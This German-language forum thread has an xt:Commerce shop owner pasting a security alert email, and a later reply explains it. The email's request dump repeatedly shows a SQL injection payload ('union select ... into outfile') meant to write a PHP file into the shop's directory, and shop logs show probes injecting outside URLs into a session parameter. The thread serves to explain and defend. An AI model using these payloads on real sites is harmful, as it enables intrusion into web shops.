Jump to content
xt:Commerce Community Forum

Was ist das: Attempted hack on your site? (type: Intrusion detection.)


melinda*at

Recommended Posts

Hallo,

Mein Shop ist jetzt offline. :mad:

Gestern Abend sind 160 Mails, dann heute als ich mein PC eingeschaltet habe ca. 280 Attempted hack on your site? (type: Intrusion detection.) gekommen...beide male haben wir den Shop gleich unerreichbar macht.

Mailinhalt:

Attention site admin of Melinda Silbermode, On DATE_FORMAT_LONG at DATE_TIME_FORMAT_SHORT the xt:C System has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did! Anyway, it was detected and blocked. The suspicious activity was recognized in /homepages/46/d132898374/htdocs/silber/inc/xtc_Security.inc.php on line 68, and is of the type xt:C Security Alert. Additional information given by the code which detected this: Intrusion detection. Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it. ===================================== Information about this user: ===================================== This person is not logged in. IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on] IP according to HTTP_CLIENT_IP: IP according to REMOTE_ADDR: 80.64.198.5 IP according to GetHostByName(80.64.198.5): 80.64.198.5 ===================================== Information in the $_REQUEST array ===================================== REQUEST * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' REQUEST * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_GET array This is about variables that may have been in the URL string or in a 'GET' type form. ===================================== GET * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' GET * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_POST array This is about visible and invisible form elements. ===================================== ===================================== Browser information ===================================== HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) BROWSER * browser_name_regex : ^mozilla/4\.0 (compatible; msie 7\.0.*;.*windows nt 5\.1.*\.net clr 1.*).*$ BROWSER * browser_name_pattern : Mozilla/4.0 (compatible; MSIE 7.0*;*Windows NT 5.1*.NET CLR 1*)* BROWSER * parent : IE 7.0 BROWSER * platform : WinXP BROWSER * netclr : 1 BROWSER * browser : IE BROWSER * version : 7.0 BROWSER * majorver : 7 BROWSER * minorver : 0 BROWSER * css : 2 BROWSER * frames : 1 BROWSER * iframes : 1 BROWSER * tables : 1 BROWSER * cookies : 1 BROWSER * backgroundsounds : 1 BROWSER * vbscript : 1 BROWSER * javascript : 1 BROWSER * javaapplets : 1 BROWSER * activexcontrols : 1 BROWSER * cdf : 1 BROWSER * aol : BROWSER * beta : 1 BROWSER * win16 : BROWSER * crawler : BROWSER * stripper : BROWSER * wap : BROWSER * ismobiledevice : BROWSER * ak : BROWSER * sk : ===================================== Information in the $_SERVER array ===================================== SERVER * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs SERVER * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* SERVER * HTTP_ACCEPT_LANGUAGE : en-us SERVER * HTTP_CONNECTION : Close SERVER * HTTP_HOST : www.melinda.at SERVER * HTTP_UA_CPU : x86 SERVER * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) SERVER * PATH : /bin:/usr/bin SERVER * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * REDIRECT_SCRIPT_URL : /silber/index.php SERVER * REDIRECT_STATUS : 200 SERVER * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * REDIRECT_URL : /silber/index.php SERVER * REMOTE_ADDR : 80.64.198.5 SERVER * REMOTE_PORT : 40815 SERVER * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * SCRIPT_URL : /silber/index.php SERVER * SERVER_ADDR : 82.165.87.12 SERVER * SERVER_ADMIN : [email protected] SERVER * SERVER_NAME : melinda.at SERVER * SERVER_PORT : 80 SERVER * SERVER_SIGNATURE : SERVER * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 SERVER * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * GATEWAY_INTERFACE : CGI/1.1 SERVER * SERVER_PROTOCOL : HTTP/1.0 SERVER * REQUEST_METHOD : GET SERVER * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * SCRIPT_NAME : /silber/index.php SERVER * PATH_INFO : /silber/index.php SERVER * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * STATUS : 200 SERVER * PHP_SELF : /silber/index.php SERVER * argv : Array SERVER * argc : 1 ===================================== Information in the $_ENV array ===================================== ENV * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs ENV * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* ENV * HTTP_ACCEPT_LANGUAGE : en-us ENV * HTTP_CONNECTION : Close ENV * HTTP_HOST : www.melinda.at ENV * HTTP_UA_CPU : x86 ENV * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) ENV * PATH : /bin:/usr/bin ENV * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * REDIRECT_SCRIPT_URL : /silber/index.php ENV * REDIRECT_STATUS : 200 ENV * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * REDIRECT_URL : /silber/index.php ENV * REMOTE_ADDR : 80.64.198.5 ENV * REMOTE_PORT : 40815 ENV * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * SCRIPT_URL : /silber/index.php ENV * SERVER_ADDR : 82.165.87.12 ENV * SERVER_ADMIN : [email protected] ENV * SERVER_NAME : melinda.at ENV * SERVER_PORT : 80 ENV * SERVER_SIGNATURE : ENV * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 ENV * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * GATEWAY_INTERFACE : CGI/1.1 ENV * SERVER_PROTOCOL : HTTP/1.0 ENV * REQUEST_METHOD : GET ENV * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull%2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22.%22linked%22%29%20%3F%3E%27%20into%20outfile%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * SCRIPT_NAME : /silber/index.php ENV * PATH_INFO : /silber/index.php ENV * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * STATUS : 200 ===================================== Information in the $_COOKIE array ===================================== ===================================== Information in the $_FILES array ===================================== ===================================== Information in the $_SESSION array This is session info.=====================================

zur Zeit waren Online lt. Shop:

Online ID Name IP Adresse Startzeit Letzter Klick Letzte URL

00:06:54 0 Guest 80.64.198.5 20:19:27 20:19:27 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.qubestun

00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.clubnata

00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Frabotnitsa.r

00:07:00 0 Guest 80.64.198.5 20:19:21 20:21:41 /silber/product_info.php?cPath=29&products_id=134&

00:06:45 0 Guest 88.117.54.115 20:19:36 20:19:51 /silber/product_info.php?products_id=103&cPath=30

00:04:45 0 Guest 80.64.198.5 20:21:36 20:21:44 /silber/create_guest_account.php?

und natürlich ich war online...

wäre für jede Hilfe sehr dankbar...

lieben Gruß an Alle!:D

Link to comment
Share on other sites

  • 5 months later...

Hallo Melinda,

offenbar scheint sich Dein Problem ja insofern erledigt haben, dass Du gar keinen xt:Commerce-Shop mehr benutzt (oder zumindest einen überaus vielfältig umgebauten...) ;)

Nur als Erklärung, falls noch andere Leute (wie ich) zufällig auf diesen Thread stossen:

Die Mails wurden vom internen "Türsteher" des Shops versendet, der viele Einbruchsversuche in den Shop verhindert und dann den Admin per Mail informiert.

In Deinem Fall hat tatsächlich jemand versucht, über eine präparierte URL ohne Berechtigung Inhalte aus der Datenbank auszulesen und in eine Datei zu schreiben, die nicht zur Installation gehört (includes/classes/Smarty_2.6.6/jatest.php - vielleicht wurde zuvor schon eingebrochen und diese Datei hinterlegt).

Woran ich das erkenne? An der Info, die im sog. GET-Array steht:

union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/xx/xxxxxx/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'[/CODE]

Ist eine von aussen eingeschleuste Datenbankabfrage - sowas nennt man SQL-Injection. Wenn's funktioniert, kann der böse Cracker alles mit Deiner Datenbank anstellen. Wenn Du die o.g. Mail bekommst, hat's nicht funktioniert :cool:

Da Du 160 Mails bekommen hast, war das wohl ein böser Bot, der 160x ins Leere gelaufen ist. Also [i]zunächst[/i] mal Glück gehabt... Was jetzt nicht heissen soll, dass dieser Mechanismus 100%igen Schutz bietet!

Cheers,

IaN

Link to comment
Share on other sites

  • 3 months later...

Archived

This topic is now archived and is closed to further replies.

×
  • Create New...